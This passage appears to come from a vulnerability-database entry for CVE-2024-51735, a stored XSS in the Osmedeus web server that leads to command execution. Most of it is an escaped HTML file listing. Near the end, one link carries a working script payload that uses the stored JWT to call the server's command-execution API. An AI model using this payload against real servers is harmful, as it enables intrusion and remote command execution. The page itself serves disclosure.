href=\"test73.php\"\u003etest73.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test74.php\"\u003etest74.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test75.php\"\u003etest75.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test76.php\"\u003etest76.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test77.php\"\u003etest77.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test78.php\"\u003etest78.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test79.php\"\u003etest79.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test80.php\"\u003etest80.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test81.php\"\u003etest81.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test82.php\"\u003etest82.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test83.php\"\u003etest83.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test84.php\"\u003etest84.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test85.php\"\u003etest85.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test86.php\"\u003etest86.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test87.php\"\u003etest87.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test88.php\"\u003etest88.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test89.php\"\u003etest89.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test90.php\"\u003etest90.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test91.php\"\u003etest91.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test92.php\"\u003etest92.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test93.php\"\u003etest93.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test94.php\"\u003etest94.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test95.php\"\u003etest95.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test96.php\"\u003etest96.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test97.php\"\u003etest97.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test98.php\"\u003etest98.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test99.php\"\u003etest99.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test100.php\"\u003etest100.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test101.php\"\u003etest101.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test102.php\"\u003etest102.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test103.php\"\u003etest103.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test104.php\"\u003etest104.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test105.php\"\u003etest105.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test106.php\"\u003etest106.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test107.php\"\u003etest107.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test108.php\"\u003etest108.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test109.php\"\u003etest109.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test110.php\"\u003etest110.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test111.php\"\u003etest111.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test112.php\"\u003etest112.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test113.php\"\u003etest113.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test114.php\"\u003etest114.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test115.php\"\u003etest115.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test116.php\"\u003etest116.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test117.php\"\u003etest117.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test118.php\"\u003etest118.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test119.php\"\u003etest119.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test120.php\"\u003etest120.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test121.php\"\u003etest121.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test122.php\"\u003etest122.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test123.php\"\u003etest123.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test124.php\"\u003etest124.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test125.php\"\u003etest125.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test126.php\"\u003etest126.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test127.php\"\u003etest127.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test128.php\"\u003etest128.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test129.php\"\u003etest129.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test130.php\"\u003etest130.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test131.php\"\u003etest131.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test132.php\"\u003etest132.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test133.php\"\u003etest133.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test134.php\"\u003etest134.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test135.php\"\u003etest135.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test136.php\"\u003etest136.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test137.php\"\u003etest137.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test138.php\"\u003etest138.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test139.php\"\u003etest139.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test140.php\"\u003etest140.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test141.php\"\u003etest141.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test142.php\"\u003etest142.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test143.php\"\u003etest143.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test144.php\"\u003etest144.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test145.php\"\u003etest145.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test146.php\"\u003etest146.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test147.php\"\u003etest147.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test148.php\"\u003etest148.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test149.php\"\u003etest149.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test150.php\"\u003etest150.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test151.php\"\u003etest151.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test152.php\"\u003etest152.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test153.php\"\u003etest153.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test154.php\"\u003etest154.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test155.php\"\u003etest155.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test156.php\"\u003etest156.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test157.php\"\u003etest157.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test158.php\"\u003etest158.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test159.php\"\u003etest159.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test160.php\"\u003etest160.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test161.php\"\u003etest161.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test162.php\"\u003etest162.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test163.php\"\u003etest163.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test164.php\"\u003etest164.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test165.php\"\u003etest165.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test166.php\"\u003etest166.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test167.php\"\u003etest167.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test168.php\"\u003etest168.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test169.php\"\u003etest169.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test170.php\"\u003etest170.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test171.php\"\u003etest171.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test172.php\"\u003etest172.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test173.php\"\u003etest173.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test174.php\"\u003etest174.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test175.php\"\u003etest175.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test176.php\"\u003etest176.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test177.php\"\u003etest177.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test178.php\"\u003etest178.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test179.php\"\u003etest179.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test180.php\"\u003etest180.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test181.php\"\u003etest181.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test182.php\"\u003etest182.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test183.php\"\u003etest183.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test184.php\"\u003etest184.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test185.php\"\u003etest185.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test186.php\"\u003etest186.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test187.php\"\u003etest187.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test188.php\"\u003etest188.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test189.php\"\u003etest189.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test190.php\"\u003etest190.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test191.php\"\u003etest191.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test192.php\"\u003etest192.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test193.php\"\u003etest193.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test194.php\"\u003etest194.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test195.php\"\u003etest195.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test196.php\"\u003etest196.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test197.php\"\u003etest197.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test198.php\"\u003etest198.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test199.php\"\u003etest199.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test200.php\"\u003etest200.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test201.php\"\u003etest201.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test202.php\"\u003etest202.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test203.php\"\u003etest203.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test204.php\"\u003etest204.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test205.php\"\u003etest205.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test206.php\"\u003etest206.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test207.php\"\u003etest207.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test208.php\"\u003etest208.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test209.php\"\u003etest209.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test210.php\"\u003etest210.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test211.php\"\u003etest211.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test212.php\"\u003etest212.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test213.php\"\u003etest213.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test214.php\"\u003etest214.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test215.php\"\u003etest215.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test216.php\"\u003etest216.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test217.php\"\u003etest217.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test218.php\"\u003etest218.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test219.php\"\u003etest219.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test220.php\"\u003etest220.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test221.php\"\u003etest221.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test222.php\"\u003etest222.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test223.php\"\u003etest223.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test224.php\"\u003etest224.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test225.php\"\u003etest225.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test226.php\"\u003etest226.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test227.php\"\u003etest227.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test228.php\"\u003etest228.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test229.php\"\u003etest229.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test230.php\"\u003etest230.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test231.php\"\u003etest231.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test232.php\"\u003etest232.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test233.php\"\u003etest233.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test234.php\"\u003etest234.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test235.php\"\u003etest235.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test236.php\"\u003etest236.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test237.php\"\u003etest237.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test238.php\"\u003etest238.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test239.php\"\u003etest239.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test240.php\"\u003etest240.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test241.php\"\u003etest241.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test242.php\"\u003etest242.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test243.php\"\u003etest243.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test244.php\"\u003etest244.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test245.php\"\u003etest245.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test246.php\"\u003etest246.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test247.php\"\u003etest247.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test248.php\"\u003etest248.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test249.php\"\u003etest249.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test250.php\"\u003etest250.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test251.php\"\u003etest251.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test252.php\"\u003etest252.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test253.php\"\u003etest253.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test254.php\"\u003etest254.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test255.php\"\u003etest255.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test256.php\"\u003etest256.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test257.php\"\u003etest257.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test258.php\"\u003etest258.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test259.php\"\u003etest259.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test260.php\"\u003etest260.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test261.php\"\u003etest261.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test262.php\"\u003etest262.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test263.php\"\u003etest263.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test264.php\"\u003etest264.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test265.php\"\u003etest265.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test266.php\"\u003etest266.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test267.php\"\u003etest267.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test268.php\"\u003etest268.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test269.php\"\u003etest269.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test270.php\"\u003etest270.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test271.php\"\u003etest271.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test272.php\"\u003etest272.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test273.php\"\u003etest273.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test274.php\"\u003etest274.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test275.php\"\u003etest275.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test276.php\"\u003etest276.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test277.php\"\u003etest277.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test278.php\"\u003etest278.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test279.php\"\u003etest279.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test280.php\"\u003etest280.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test281.php\"\u003etest281.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test282.php\"\u003etest282.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test283.php\"\u003etest283.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test284.php\"\u003etest284.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test285.php\"\u003etest285.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test286.php\"\u003etest286.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test287.php\"\u003etest287.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test288.php\"\u003etest288.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test289.php\"\u003etest289.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test290.php\"\u003etest290.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test291.php\"\u003etest291.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test292.php\"\u003etest292.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test293.php\"\u003etest293.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test294.php\"\u003etest294.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test295.php\"\u003etest295.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test296.php\"\u003etest296.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test297.php\"\u003etest297.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test298.php\"\u003etest298.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test299.php\"\u003etest299.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test300.php\"\u003etest300.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf\"\u003eThe.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ThuHo.rar\"\u003eThuHo.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vue.js%20Master%20Class%202024%20Edition.rar\"\u003eVue.js Master Class 2024 Edition.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"VueSchool%20-%20The%20Vue.js%203%20Masterclass%20%282024-4%29.rar\"\u003eVueSchool - The Vue.js 3 Masterclass (2024-4).rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"win%20server%202016%281%29.ovf\"\u003ewin server 2016(1).ovf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"win%20server%202016.ovf\"\u003ewin server 2016.ovf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"?abc=\u003cscript\u003efetch(window.location.origin+\u0027/api/osmp/execute\u0027,{method:\u0027POST\u0027,body:JSON.stringify({command:\u0027echo 1 \u003e/tmp/js.txt\u0027,password:\u0027\u0027}),headers:{Authorization:\u0027Osmedeus \u0027+localStorage.jwt,\u0027Content-Type\u0027:\u0027application/json\u0027}});\u003c/script\u003e\"\u003eyxfzssjq_1721182234998.pdf\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\n```\n\n### Impact\nExecute command on server\n",
  "id": "GHSA-wvv7-wm5v-w2gv",
  "modified": "2024-11-06T19:55:13Z",
  "published": "2024-11-05T15:18:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/j3ssie/osmedeus/security/advisories/GHSA-wvv7-wm5v-w2gv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51735"
    },
    {
      "type": "WEB",
      "url": "https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/j3ssie/osmedeus"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Osmedeus Web Server Vulnerable to Stored XSS, Leading to RCE"
}
CVE-2024-51735 (GCVE-0-2024-51735)

Vulnerability from cvelistv5

Published
2024-11-05 18:49
Modified
2024-11-05 21:47
Severity ?
8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CWE
CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
Summary
Osmedeus is a Workflow Engine for Offensive Security. Cross-site Scripting (XSS) occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server. When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the `general-template.md` template.The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS. This may lead to commands executed on the host as well. This issue is not yet resolved. Users are advised to add their own filtering or to reach out to the developer to aid in developing a patch.
References
►
URL
	Vendor	Product	Version
	j3ssie	osmedeus	Version: <= 4.6.4
Sightings

Author	Source	Type	Date
Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Action not permitted

ghsa-wvv7-wm5v-w2gv

Vulnerability from github

Summary

Details

Scan Information

